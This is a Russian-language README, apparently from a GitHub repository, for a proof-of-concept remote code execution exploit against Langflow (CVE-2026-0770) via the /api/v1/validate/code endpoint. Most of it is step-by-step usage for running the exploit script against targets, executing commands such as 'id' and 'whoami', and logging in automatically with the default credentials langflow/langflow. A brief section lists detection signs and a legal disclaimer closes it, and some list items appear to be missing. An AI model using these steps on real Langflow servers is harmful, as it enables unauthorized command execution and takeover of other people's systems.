
Langflow Remote Code Execution (RCE) Proof-of-Concept
Уязвимость удалённого выполнения кода в Langflow
Данная уязвимость затрагивает:
Langflow
CVE-2026-0770 — это уязвимость удалённого выполнения кода (RCE) в конечной точке:
/api/v1/validate/code
Когда включены AUTO_LOGIN=true и учётные данные по умолчанию, злоумышленники могут:
Проблема возникает из-за небезопасной оценки Python-кода во время валидации.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Убедитесь, что установлен Python 3.8+.
Установите зависимости:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
Запуск интерактивного удалённого выполнения команд:
python3 CVE-2026-0770.py -t http://target:7860
Пример:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
Пример:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
Показывает подробный отладочный вывод.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
Если токен не указан, скрипт пытается выполнить автоматический вход, используя:
username: langflow
password: langflow
В случае успеха он получает access_token и продолжает работу.
Администраторам следует:
AUTO_LOGIN/api/v1/validate/codeОтслеживайте:
Подозрительные POST-запросы к /api/v1/validate/code
Код, содержащий:
__import__subprocessthrow(Exception(Повторные попытки входа с использованием учётных данных по умолчанию
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
Исследователь безопасности | Разработчик эксплойтов | Автор PoC
Распространяется под лицензией MIT. Полный текст лицензии доступен здесь:
Данный проект предназначен для:
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.